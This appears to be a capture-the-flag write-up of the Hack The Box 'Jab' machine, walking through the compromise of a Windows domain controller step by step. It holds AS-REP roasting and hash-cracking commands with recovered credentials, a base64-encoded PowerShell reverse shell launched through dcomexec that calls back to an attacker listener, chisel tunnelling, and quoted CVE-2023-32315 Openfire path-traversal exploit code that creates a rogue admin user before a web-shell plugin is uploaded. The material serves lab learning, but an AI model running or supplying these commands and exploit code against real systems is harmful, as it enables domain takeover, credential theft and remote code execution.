Jab
Steps to Get the Root Flag:
Obtain a user's NTLM hash and crack it to find the password.
Use the user's credentials to access port "5222" and obtain credentials for another user.
Use the obtained credentials to explore further and run BloodHound to identify potential paths.
Gain shell access on DC01 and search for ways to escalate privileges.
Access the web application and upload a shell to compromise the domain.
lets begin
I started with the usual Nmap scan and while it was running i also did some enumeration on common ports like "smb/rpc/ldap" but i didn't find anything interesting so here are the Nmap results
# Nmap 7.94SVN scan initiated Wed Mar 20 13:52:35 2024 as: nmap -A -T4 -oN nmap.txt -Pn 10.10.11.4
Warning: 10.10.11.4 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.4 (10.10.11.4)
Host is up (0.22s latency).
Not shown: 902 closed tcp ports (conn-refused), 85 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-03-20 17:59:27Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-20T18:01:24+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
|_ssl-date: 2024-03-20T18:01:31+00:00; +2s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-20T18:01:26+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after: 2024-10-31T20:16:18
5222/tcp open jabber Ignite Realtime Openfire Jabber server 3.10.0 or later
| xmpp-info:
| STARTTLS Failed
| info:
| features:
| errors:
| invalid-namespace
| (timeout)
| compression_methods:
| auth_mechanisms:
| capabilities:
| xmpp:
| version: 1.0
| stream_id: 2llsnnt55f
|_ unknown:
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after: 2028-10-24T22:00:12
5269/tcp open xmpp Wildfire XMPP Client
| xmpp-info:
| Respects server name
| STARTTLS Failed
| info:
| features:
| errors:
| host-unknown
| (timeout)
| compression_methods:
| auth_mechanisms:
| capabilities:
| xmpp:
| version: 1.0
| stream_id: axra5bza2w
|_ unknown:
7070/tcp open realserver?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP:
| HTTP/1.1 400 Illegal character CNTL=0x0
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
| GetRequest:
| HTTP/1.1 200 OK
| Date: Wed, 20 Mar 2024 17:59:24 GMT
| Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
| Content-Type: text/html
| Accept-Ranges: bytes
| Content-Length: 223
| <html>
| <head><title>Openfire HTTP Binding Service</title></head>
| <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
| </html>
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Wed, 20 Mar 2024 17:59:36 GMT
| Allow: GET,HEAD,POST,OPTIONS
| Help:
| HTTP/1.1 400 No URI
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 49
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: No URI</pre>
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
| RTSPRequest:
| HTTP/1.1 505 Unknown Version
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 58
| Connection: close
| <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
| TerminalServerCookie:
| HTTP/1.1 400 Illegal character CNTL=0x3
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 69
| Connection: close
|_ <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x3</pre>
7777/tcp open socks5 (No authentication; connection failed)
| socks-auth-info:
|_ No authentication
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port7070-TCP:V=7.94SVN%I=7%D=3/20%Time=65FB23FB%P=x86_64-pc-linux-gnu%r
SF:(GetRequest,189,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2020\x20Mar\x
SF:202024\x2017:59:24\x20GMT\r\nLast-Modified:\x20Wed,\x2016\x20Feb\x20202
SF:2\x2015:55:02\x20GMT\r\nContent-Type:\x20text/html\r\nAccept-Ranges:\x2
SF:0bytes\r\nContent-Length:\x20223\r\n\r\n<html>\n\x20\x20<head><title>Op
SF:enfire\x20HTTP\x20Binding\x20Service</title></head>\n\x20\x20<body><fon
SF:t\x20face=\"Arial,\x20Helvetica\"><b>Openfire\x20<a\x20href=\"http://ww
SF:w\.xmpp\.org/extensions/xep-0124\.html\">HTTP\x20Binding</a>\x20Service
SF:</b></font></body>\n</html>\n")%r(RTSPRequest,AD,"HTTP/1\.1\x20505\x20U
SF:nknown\x20Version\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nC
SF:ontent-Length:\x2058\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\
SF:x20505</h1><pre>reason:\x20Unknown\x20Version</pre>")%r(HTTPOptions,56,
SF:"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Wed,\x2020\x20Mar\x202024\x2017:59:
SF:36\x20GMT\r\nAllow:\x20GET,HEAD,POST,OPTIONS\r\n\r\n")%r(RPCCheck,C7,"H
SF:TTP/1\.1\x20400\x20Illegal\x20character\x20OTEXT=0x80\r\nContent-Type:\
SF:x20text/html;charset=iso-8859-1\r\nContent-Length:\x2071\r\nConnection:
SF:\x20close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\
SF:x20character\x20OTEXT=0x80</pre>")%r(DNSVersionBindReqTCP,C3,"HTTP/1\.1
SF:\x20400\x20Illegal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/ht
SF:ml;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\
SF:r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20Illegal\x20charact
SF:er\x20CNTL=0x0</pre>")%r(DNSStatusRequestTCP,C3,"HTTP/1\.1\x20400\x20Il
SF:legal\x20character\x20CNTL=0x0\r\nContent-Type:\x20text/html;charset=is
SF:o-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Ba
SF:d\x20Message\x20400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x
SF:0</pre>")%r(Help,9B,"HTTP/1\.1\x20400\x20No\x20URI\r\nContent-Type:\x20
SF:text/html;charset=iso-8859-1\r\nContent-Length:\x2049\r\nConnection:\x2
SF:0close\r\n\r\n<h1>Bad\x20Message\x20400</h1><pre>reason:\x20No\x20URI</
SF:pre>")%r(TerminalServerCookie,C3,"HTTP/1\.1\x20400\x20Illegal\x20charac
SF:ter\x20CNTL=0x3\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nCon
SF:tent-Length:\x2069\r\nConnection:\x20close\r\n\r\n<h1>Bad\x20Message\x2
SF:0400</h1><pre>reason:\x20Illegal\x20character\x20CNTL=0x3</pre>");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-03-20T18:01:14
|_ start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
After a lengthy enumeration i moved on to enumerate users to check if any of them have the "don't require Kerberos authentication" setting enabled using the Kerbrute tool.
./kerbrute_linux_amd64 userenum -d jab.htb --dc 10.10.11.4 /home/kali/Desktop/my_folder/HackTheBox/academy/AD-enum/jsmith.txt -o kerb-resultsI managed to obtain NTLM hashes for some users but they weren't in the correct format for Hashcat so to extract valid usernames from these hashes i utilized the "Get-NPUsers" tool.
impacket-GetNPUsers 'jab.htb/' -usersfile users.txt -dc-ip 10.10.11.4 -format hashcat
Impacket v0.11.0 - Copyright 2023 Fortra
[email protected]:92ffbb3899a8b6acdeabff20e446cd13$e5d99f30562649d4650004b298ba052a86aa56fa0732fec8687a3eccffb534c07e2e163c1a7bde0949db156d36e34402c9a6de2ec9a7f28568701f2a636c556b5f88b505e966cede204f230a461a87cf249ce6e056d7f6f8faf3cb5c4cf156afef94d12e5021699d4dea0ae66442c000f10cda696c4c2b42d26f3907eb8d895fd5ead6c96b47c217a0e9000bd9da48ca5b99a92eb787657645bf09858af7b6934ac845c2db58b4d9de705a89f5540efa3556ab6b4b57d2045b03bf574425ce88b0b9da7dc2dffbe84f27202ef2b869ae57e93c4d67913fbc6cc41edcea59e7372717
[email protected]:75430efc7f3b4ecd7771f59bedd54b85$654e960551fac621fa5b5b585f3a442ee6d52f63f6dfbad6d011dfdce9f9524f46d41c28a74a55635bba075eba11293afdf83165025e911c323771df5c58aca62dedd707388b8ffaa645193db2b6baa8fafdd7e4cc878b062c280c8cad81a7c42602f7ee8d637c842ae9ae1f5384ac798ab5f35240844ecb82bf96cfb00f0a011fcec4e477a3f0d785186035e1d213a2e9628413e244306a601d86b9aa6d765a63fad1881d5f77447e6ce1e84c8f9e927f2e787876e1cd62cd46abc8c1328b8969198779bc6fbd1053ae15e49639a19bd5ccb5402ca1b3c583eefa61e8e3d382c925
[email protected]:c8c2c5a01efa254833d185671dae8b36$ebc9b76ea58f9dbce7e71682992d6a63cf46a6f6ff3dc5bc36988812b62a4cdc56c82e28610a2d4e6577ccbb8364b8b0d82a9c3147aa1c5091251e64435e602969ea89eeabee61a1cf9b2e0d6305bff31e4f58c03e1dba560f6e6f9c1a8d4d0a03e881c5d212717102d2d536ceaeaad86784f3d78864a3fcacd6badb29af1cc6f6762a29ae13771147b4e41727dbc30b9327b14c764a130d64dcc60f6b55f8ed228dbadb4db62d1a1c2ec1ab1962a373c89af643b59d44970b5bc9d534b3fd1c344687ff879304dbd4538805332721adec36808edd31e53db7076424dfc3f8f21c31Then i cracked them using Hashcat but I was only able to crack one of them which belonged to "jmontgomery" user.
[email protected]:73ce348100567e29985c61595ee2b08d$3498fa3a484ab2c304d9cdcd986e7a7a2a76d6434b68b57a5bb96bbaaf58d360a1d8bd311d3732d9a59e74b73bce254a3fb87b161da4eb6b07cb81783133d2ddc58e9a06295b2daaca56e76707ce8563789eb16718e5fa337c086d7a1ccaefc5d42576798efc21bc390ac1fb8f6708d516cfbda1f61f95e1dcc0d40c32a63c53f199b1ea421ef1c2ca16c04b419367f851f2e0fe7c6f556f2c4de901c4cf9677ab12d82f212b280fc2c4448b68b4d030a4bfe7a51e07a52d52b79ed0f12a47106f81397159cb7477dc7a4dd3b4c471cb34fef0c37e92ff8b83d9d154d5356e333cb2:Midnight_121Then i attempted to enumerate further using the credentials of this user but I didn't discover anything significant so I decided to interact with port "5222" and after researching the 'XMPP' protocol which stands for Extensible Messaging and Presence Protocol and commonly used in messaging platforms, collaboration tools, and Internet of Things (IoT) devices i installed the "Pidgin" tool.
sudo apt install pidgin Next i launched Pidgin and selected the XMPP protocol.
Then i added the user "jmontgomery" account credentials here
And the account successfully logged in
To gather the room list you can find it here
and click on find Rooms
We found an interesting room called "pentest2003" If we click on it
We will be in the chat room, where we will find these user credentials.
Enumerating with these credentials i noticed that this user doesn't have shell access over SMB or WinRM, and I didn't gather any special information. So i decided to run BloodHound.
sudo bloodhound-python -ns 10.10.11.4 -d jab.htb -c All -u 'svc_openfire' -p '!@#$%^&*(1qazxsw'After selecting the user as "user I owned" in BloodHound and choosing the shortest path to domain admins with the users I owned i found this.
So the user can execute DCOM over "DC01". Let's use it to get our first shell and first flag so first i generated a PowerShell reverse shell and encoded it in Base64 format using this web site
Then i ran my listener on the same port as generated in the reverse shell PowerShell and finally i used the DCOMExec tool.
dcomexec.py -object MMC20 'jab.htb/svc_openfire:!@#$%^&*([email protected]' 'Powershell.exe -EncodedCommand JABjAGEAbABsAGIAYQBjAGsAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBTAG8AYwBrAGUAdABzAC4AVABDAFAAQwBsAGkAZQBuAHQAKAAiADEAMAAuADEAMAAuADEANgAuADUANQAiACwANQAwADUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAYQBsAGwAYgBhAGMAawAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGEAbABsAGIAYQBjAGsALgBDAGwAbwBzAGUAKAApAA==' -silentcommandgetting shell in my kali
rlwrap nc -lnvp 5055
listening on [any] 5055 ...
connect to [10.10.16.55] from (UNKNOWN) [10.10.11.4] 56217In the initial foothold on the target machine you need to check the local listener port to see if there is any web page, etc...
PS C:\windows\system32> netstat -ano | findstr /i '127.0.0.1'
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 2636
TCP 127.0.0.1:389 127.0.0.1:49764 ESTABLISHED 640
TCP 127.0.0.1:9090 0.0.0.0:0 LISTENING 3164
TCP 127.0.0.1:9091 0.0.0.0:0 LISTENING 3164So, I interacted with ports and found that port 9090 hosts a web page using this command.
PS C:\windows\system32> Invoke-RestMethod -Uri "http://127.0.0.1:9090/" -Method Get
<html>
<head><title></title>
<meta http-equiv="refresh" content="0;URL=index.jsp">
</head>
<body>
</body>
</html>And if we add "index.jsp", we will get the content of the web page.
PS C:\windows\system32> Invoke-RestMethod -Uri "http://127.0.0.1:9090/index.jsp" -Method Getso i started chisel on my kali as server
/home/kali/Desktop/chisel_1.9.1_linux_amd64 server -p 9999 -reverse
2024/03/27 18:29:48 server: Reverse tunnelling enabled
2024/03/27 18:29:48 server: Fingerprint D99oIixX7Uvimv5A3ethbzP4rf1n0qixGamg4l7j5hQ=
2024/03/27 18:29:48 server: Listening on http://0.0.0.0:9999
2024/03/27 18:30:05 server: session#1: tun: proxy#R:9090=>9090: ListeningI downloaded it on the Windows machine and started it as a client to forward the local web page to my Kali.
PS C:\users\svc_openfire\Documents> .\chisel.exe client 10.10.16.55:9999 R:9090:127.0.0.1:909When the homepage loads i just simply use the credentials of the compromised user "svc_openfire"
And it works! I searched if there is any upload option on the site and you know what we're going to do if we find it right? xD I found it in this path so we need to upload a plugin with a .jar extension.
After searching for this version of Openfire i found it vulnerable. Additionally i found a web shell plugin. So i uploaded it and finally get the root flag and compromise the domain.
But wait a minute, we need to understand this CVE-2023-32315 first because as we know we're not script kiddies who just execute exploits without knowing what happens in the background xD Here is the link to the CVE Poc I just selected this code snippet, which is the exploit phase:
def exploit(target):
hack = HackRequests.hackRequests()
host = target.split("://")[1]
# setup 1: get csrf + jsessionid
jsessionid = ""
csrf = ""
try:
url = f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"DNT": "1",
"X-Forwarded-For": "1.2.3.4",
"Upgrade-Insecure-Requests": "1"
}
print(f"[..] Checking target: {target}")
hh = hack.http(url, headers=headers)
jsessionid = hh.cookies.get('JSESSIONID', '')
csrf = hh.cookies.get('csrf', '')
if jsessionid != "" and csrf != "":
print(f"Successfully retrieved JSESSIONID: {jsessionid} + csrf: {csrf}")
else:
print("Failed to get JSESSIONID and csrf value")
return
# setup 2: add user
username = generate_random_string(6)
password = generate_random_string(6)
header2 = {
"Host": host,
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0",
"Accept-Encoding": "gzip, deflate",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Connection": "close",
"Cookie": f"JSESSIONID={jsessionid}; csrf={csrf}",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"DNT": "1",
"X-Forwarded-For": "1.2.3.4",
"Upgrade-Insecure-Requests": "1"
}
create_user_url= f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
hhh = hack.http(create_user_url, headers=header2)
if hhh.status_code == 200:
print(f"User added successfully: url: {target} username: {username} password: {password}")
with open("success.txt", "a+") as f:
f.write(f"url: {target} username: {username} password: {password}\n")
else:
print("Failed to add user")
# setup 3: add plugin
except Exception as e:
print(f"Error occurred while retrieving cookies: {e}")
This script is easy to understand, and we discovered that the version of Openfire is vulnerable to path traversal and broken access authentication. it allows unauthenticated access to application files by using Unicode characters in URL encoding.
%u002e%u002e/%u002e%u002e = ../..So the exploit is divided into 3 phases. Let's explain:
Phase 1:
Access the page "user-groups.jsp" by exploiting path traversal then take CSRF token and jsessionid.
Phase 2:
In the last phase, we access "user-create.jsp" using the same technique and create our fake user with the role admin. But in our case we already have access with compromised credentials.
create_user_url= f"{target}/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf={csrf}&username={username}&name=&email=&password={password}&passwordConfirm={password}&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"Phase 3:
Access the admin panel and upload the malicious plugin for RCE.
Last updated
Was this helpful?